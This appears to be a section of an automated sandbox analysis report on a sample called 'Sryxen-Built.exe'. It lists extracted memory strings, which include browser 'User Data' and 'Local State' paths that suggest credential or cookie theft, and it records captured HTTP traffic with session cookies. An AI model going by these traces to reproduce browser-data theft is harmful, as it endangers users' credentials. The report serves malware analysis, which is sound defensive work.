Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308113785.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ntkrnlmp.pdbrppDa source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State\*` source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\eh source: Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319851214.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local State*tet source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ntkrnlmp.pdb<AppCache133858168207041016.txt source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe\* source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ta\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*te/ source: Sryxen-Built.exe, 00000000.00000003.1319923806.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: d_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbO0# source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323702315.00000273000CB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2te** source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbtManagementSDK\Local Stateages\c5e252 source: Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ataState source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*{ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1311546341.00000273000FD000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtateanag source: Sryxen-Built.exe, 00000000.00000003.1303981152.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304546053.00000273000C7000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Data source: Sryxen-Built.exe, 00000000.00000003.1300184374.00000273000DF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiese\*f source: Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*2 source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pd source: Sryxen-Built.exe, 00000000.00000003.1303287287.00000273000D5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302905777.00000273000D3000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300485113.00000273000D5000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056E source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300116000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\y\* source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate\*e\*b source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17} source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 State source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbs.dat source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateon source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbte source: Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300106421.00000273000F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ate source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2State source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State*te source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2s\*te source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2e\*eW6 source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\eState source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ngState\* source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb2658 source: Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statete\* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\enses\Local Stateatee6 source: Sryxen-Built.exe, 00000000.00000003.1297909339.0000027300107000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1297889178.0000027300101000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Sryxen-Built.exe, 00000000.00000003.1376501041.00000273002EA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002EB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376398317.00000273002E1000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376811787.00000273002F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local Statetate4 source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbs\tate&)` source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\***p source: Sryxen-Built.exe, 00000000.00000003.1303947102.0000027300108000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304159912.0000027300108000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*ew source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Uninstall-PerUser_2025-03-07_103157_8ac-16f4.log.pdbjon source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*a source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\*n* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325746295.00000273000DB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Datatatee source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*. source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbte source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831tetete source: Sryxen-Built.exe, 00000000.00000003.1325269713.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325153577.0000027300110000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: e7b466d5-50e5-406a-8ec7-bccc33cd9768.up_meta_body.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1308726433.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309593143.0000027300111000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\User Data\Local Stateeay source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic | HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: 